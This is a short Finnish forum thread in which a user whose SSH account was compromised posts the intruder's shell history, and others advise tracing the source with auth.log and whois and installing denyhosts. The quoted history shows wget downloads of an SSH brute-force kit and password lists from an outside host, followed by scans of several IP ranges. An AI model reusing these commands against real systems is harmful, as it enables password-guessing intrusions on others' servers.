Haittaohjelma_SSH

[Leko]

Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus. Sen .bash_historia näyttää tältä:

Koodia: [Valitse]

w
cd .cbk
cd fhc
wget http://users.volja.net/passlists/fhc.tar.gz
tar -xzvf fhc.tar.gz
cd fhc
./start 84.244
wget http://users.volja.net/passlists/norrox.txt
mv norrox.txt pass_file
./start 128.39
./start 199.6;./start 204.79;./start 204.231;./start 205.248
Paketti on mulla vielä tallessa. Kertokaapa, kuka tai mikä taho olisi oikeasti kiinnostunut asiasta. Yst. vast. tänne tai privalla.

[Tuplanolla]

Kannattaapi katsella mistä ip-osoitteista tälläinen on tullut.

Eli grep sshd <käyttäjänimi> /var/log/auth.log
Sieltä pitäisi löytyä rivejä tyyliin:

Jan 28 13:44:51 zeus sshd[15824]: Accepted password for joona from 192.168.0.102 port 1036 ssh2

Siitä poimit ip-osoitteen ja laitat päätteeseen että whois <ip-osoite>.
Sepä kertoo sitten mikä isp toisessa päässä on ja varmaan löytyy myös sähköpostiosoite mihin voi ottaa yhteyttä. Usein tyyliin abuse@isp.pääte.

[Leko]

Tuoltapäin näyttää olevan, vaikka en minä mitään sillä tiedolla tee.

IP address   84.255.243.157
Hostname   84-255-243-157.static.t-2.net
ISP   T-2 Access Network
Country   Slovenia Slovenia

[mgronber]

Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus.

Ensi kerralla kannattaa laittaa koneelle denyhosts tai vastaava jotta skannailut eivät onnistu yhtä helposti.